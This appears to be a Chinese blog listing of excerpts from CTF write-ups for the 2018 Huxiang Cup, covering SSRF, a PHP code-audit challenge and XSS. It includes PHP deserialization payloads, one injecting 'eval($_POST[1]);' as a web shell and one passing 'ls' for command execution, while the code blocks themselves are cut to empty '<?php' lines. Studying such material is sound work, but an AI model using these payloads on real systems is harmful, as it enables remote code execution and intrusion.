2018 湖湘杯 线上初赛 部分题解
由于比赛冲突,湖湘杯也就没什么时间打,匆匆看了一题SSRF,以作笔记。
由于比赛冲突,湖湘杯也就没什么时间打,匆匆看了一题SSRF,以作笔记。
SSRF,即Server-Side Request Forgery,中文名服务端请求伪造,是一种由攻击者构造形成由服务器端发起请求的一个漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。
简单来说,就是利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。
1 | <?php |
1 | <?php |
1 | http://172.1.14.1/pop.php?ciscn[huaibei.pop=getflaggetflaggetflaggetflaggetflaggetflag&pop=;s:3:"end";O:2:"Go":1:{s:3:"ray";O:3:"Get":2:{s:4:"func";s:9:"phpinfo()";s:4:"name";O:3:"Get":2:{s:4:"func";O:4:"Done":4:{s:4:"eval";s:16:"eval($_POST[1]);";s:5:"class";N;s:3:"use";R:8;s:7:"useless";s:16:"eval($_POST[1]);";}s:4:"name";s:1:"1";}}}} |
1 | <?php |
1 | /?poc=O:1:%22A%22:2:{s:4:%22func%22;N;s:4:%22end2%22;R:2;}¶m=ls |
1 | <?php |
1 | <?php |
首发于安恒网络空间安全讲武堂,第一次投稿,不足之处还请海涵Orz。
一道代码审计题,看的我头痛【我的PHP实在是太菜了Orz。
XSS全称为跨站脚本攻击【Cross Site Scripting,为不与层叠样式表【Cascading Style Sheets, CSS缩写混淆,故此名为XSS。
XSS恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。